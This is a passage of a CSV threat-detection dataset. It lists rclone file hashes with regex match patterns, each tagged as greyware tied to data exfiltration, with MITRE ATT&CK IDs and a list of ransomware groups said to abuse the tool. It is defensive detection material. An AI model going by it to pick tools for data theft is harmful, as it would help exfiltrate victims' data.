services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*a8813d25c4640e52495fee83e525e76283c63f01d1cce8fbb58d8486b0c20c8a*",".{0,1000}a8813d25c4640e52495fee83e525e76283c63f01d1cce8fbb58d8486b0c20c8a.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*a8a5a27b5051f5079b3a62d0e3b26c8346a7208059c6ab85dc9c7534f96dc7c0*",".{0,1000}a8a5a27b5051f5079b3a62d0e3b26c8346a7208059c6ab85dc9c7534f96dc7c0.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*a8d8afce93bf8e3328ba6e223d22649fd8756cc4b39d38d72c278152fad2e435*",".{0,1000}a8d8afce93bf8e3328ba6e223d22649fd8756cc4b39d38d72c278152fad2e435.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*a8f5766e5cb04c12e405ed4b8a1c984f1a0963d77529e2e20793e777dc7dd742*",".{0,1000}a8f5766e5cb04c12e405ed4b8a1c984f1a0963d77529e2e20793e777dc7dd742.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*a96191ac73f7407bf98729738792ba5aaf0395665aeff5a98127a2a5bc629cde*",".{0,1000}a96191ac73f7407bf98729738792ba5aaf0395665aeff5a98127a2a5bc629cde.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*a9c63cf38aa31e0c152029ffe6b43c647efb81b9b2d003354ffbc8f6e65fa1c4*",".{0,1000}a9c63cf38aa31e0c152029ffe6b43c647efb81b9b2d003354ffbc8f6e65fa1c4.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*aa00b01e21fa7c923b23ebd96a67d7938c46c1e35e7ccc5fbda33280caf14679*",".{0,1000}aa00b01e21fa7c923b23ebd96a67d7938c46c1e35e7ccc5fbda33280caf14679.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*aa89676f1368beb077bb52fe344e840456a471856273cf39172a997c34c52edf*",".{0,1000}aa89676f1368beb077bb52fe344e840456a471856273cf39172a997c34c52edf.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*aacdb96cbb0320757eab5b1dc37141365180a6f31743082174530577e8c1e9c9*",".{0,1000}aacdb96cbb0320757eab5b1dc37141365180a6f31743082174530577e8c1e9c9.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*ab0266a7c72c5ce3aec59f4fe54abcd6c4c94ad79fe8057d45580c35711c6e97*",".{0,1000}ab0266a7c72c5ce3aec59f4fe54abcd6c4c94ad79fe8057d45580c35711c6e97.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*ab1e59c29544929e382c5d62062d64c50dbc3122ff42dd6b50c6f7a82186e039*",".{0,1000}ab1e59c29544929e382c5d62062d64c50dbc3122ff42dd6b50c6f7a82186e039.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*ab4be0b43fa4ace2d5caf09891b2b5cd05f7e3dcc28f35bf31e3f4af7bef59dd*",".{0,1000}ab4be0b43fa4ace2d5caf09891b2b5cd05f7e3dcc28f35bf31e3f4af7bef59dd.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*ab7142264b3a002fc8d680d5da4b75fe8e8cb0925dbb38bef87deaf409bef6f5*",".{0,1000}ab7142264b3a002fc8d680d5da4b75fe8e8cb0925dbb38bef87deaf409bef6f5.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*ab803d5f91093185538c9509f575233e1a339dc92993daa05d4bb0a6f52e3b25*",".{0,1000}ab803d5f91093185538c9509f575233e1a339dc92993daa05d4bb0a6f52e3b25.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*ab9b3d5811db36dc7f144622d4f438321713eeed0bb3aa5ce9c3bfe013b16512*",".{0,1000}ab9b3d5811db36dc7f144622d4f438321713eeed0bb3aa5ce9c3bfe013b16512.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*abcb9405f525c9cdbcfe8dfd97aca28e5ef32d3cc6d19dc1c225f0a87284068f*",".{0,1000}abcb9405f525c9cdbcfe8dfd97aca28e5ef32d3cc6d19dc1c225f0a87284068f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*abd17322abc207aa3b6a2ee6155a570edce863cc743a4e55ad8c589561a017f6*",".{0,1000}abd17322abc207aa3b6a2ee6155a570edce863cc743a4e55ad8c589561a017f6.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*abdf790219be588e22ec8260139552bc1034d97d40003e2cb5873c5398c3aa35*",".{0,1000}abdf790219be588e22ec8260139552bc1034d97d40003e2cb5873c5398c3aa35.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*ac15c323af68f3ff826a5f5e2324d4cd6ab94a72d160ed280e87655fa675387f*",".{0,1000}ac15c323af68f3ff826a5f5e2324d4cd6ab94a72d160ed280e87655fa675387f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*ac70a4781339956a755f46b5c1244b3318a6a879be6cda50474f5ec7996718fd*",".{0,1000}ac70a4781339956a755f46b5c1244b3318a6a879be6cda50474f5ec7996718fd.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*aca407659a61b8c861e960c74d66b269d69abc2d4889220379f54a2475f065b1*",".{0,1000}aca407659a61b8c861e960c74d66b269d69abc2d4889220379f54a2475f065b1.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*aca70fd97d3c7234ce29a5515db0c47c64337b6671756a0ab9e4cbe46fe81958*",".{0,1000}aca70fd97d3c7234ce29a5515db0c47c64337b6671756a0ab9e4cbe46fe81958.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*acca7f6876516ba21180fd61ef2fb27f74b73381ccb8e049e7044a26bf14aa1b*",".{0,1000}acca7f6876516ba21180fd61ef2fb27f74b73381ccb8e049e7044a26bf14aa1b.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*ad0b1b1b21f07d7dc54a2a9dade59ba6235ddeed6f9f635f4f2cca4486d0b65f*",".{0,1000}ad0b1b1b21f07d7dc54a2a9dade59ba6235ddeed6f9f635f4f2cca4486d0b65f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*ad3bb4b1c3e647d8da814e1272de5a719d39324b53038bcc63997b1471245231*",".{0,1000}ad3bb4b1c3e647d8da814e1272de5a719d39324b53038bcc63997b1471245231.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*adf6da54a084a5b8822368a4a30fe84646de8b3a00c2bef4d6261478391cd999*",".{0,1000}adf6da54a084a5b8822368a4a30fe84646de8b3a00c2bef4d6261478391cd999.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*ae0be925e6ad15b6c85814746d17876295c1736a91665a44c22cd49a431fd7cc*",".{0,1000}ae0be925e6ad15b6c85814746d17876295c1736a91665a44c22cd49a431fd7cc.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*ae3f83840abeaed5df17c82b7d8f318e88e40642d31297c2d0c4ab80ada62335*",".{0,1000}ae3f83840abeaed5df17c82b7d8f318e88e40642d31297c2d0c4ab80ada62335.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*ae6c4d028975b5126767dcfe4f1c1f0de1c9f729c123263aa35d321df918c7c8*",".{0,1000}ae6c4d028975b5126767dcfe4f1c1f0de1c9f729c123263aa35d321df918c7c8.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*aecbb25cfb2d6ef207b23febe8726e86cc0a9973948c150613222084af331cdc*",".{0,1000}aecbb25cfb2d6ef207b23febe8726e86cc0a9973948c150613222084af331cdc.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*af0d92194012434a1e01f038d1bd536922f5187c5f645e0a4708668690020fe9*",".{0,1000}af0d92194012434a1e01f038d1bd536922f5187c5f645e0a4708668690020fe9.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*af181d53332e34c71599eaa567124a3b8b28aef141152e94d9b1a52da657ee6b*",".{0,1000}af181d53332e34c71599eaa567124a3b8b28aef141152e94d9b1a52da657ee6b.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*af1baf66006d9f7ba069b6a513d894ef20423cfda9bab7cd6342eeab0fa51651*",".{0,1000}af1baf66006d9f7ba069b6a513d894ef20423cfda9bab7cd6342eeab0fa51651.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*af342555f255fdd90d55abff65b84a479e95816f3117361cb924f99ba6a4542a*",".{0,1000}af342555f255fdd90d55abff65b84a479e95816f3117361cb924f99ba6a4542a.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*af4699cdafb91bb625dbe8385af2c29bb15de6dd613f0d2e4a5c64e0d3ef6302*",".{0,1000}af4699cdafb91bb625dbe8385af2c29bb15de6dd613f0d2e4a5c64e0d3ef6302.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*af5c3753d790ac2ba4a7c4e74951e15fee5cf08153a19f6e40b0ab3f90a65f44*",".{0,1000}af5c3753d790ac2ba4a7c4e74951e15fee5cf08153a19f6e40b0ab3f90a65f44.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - 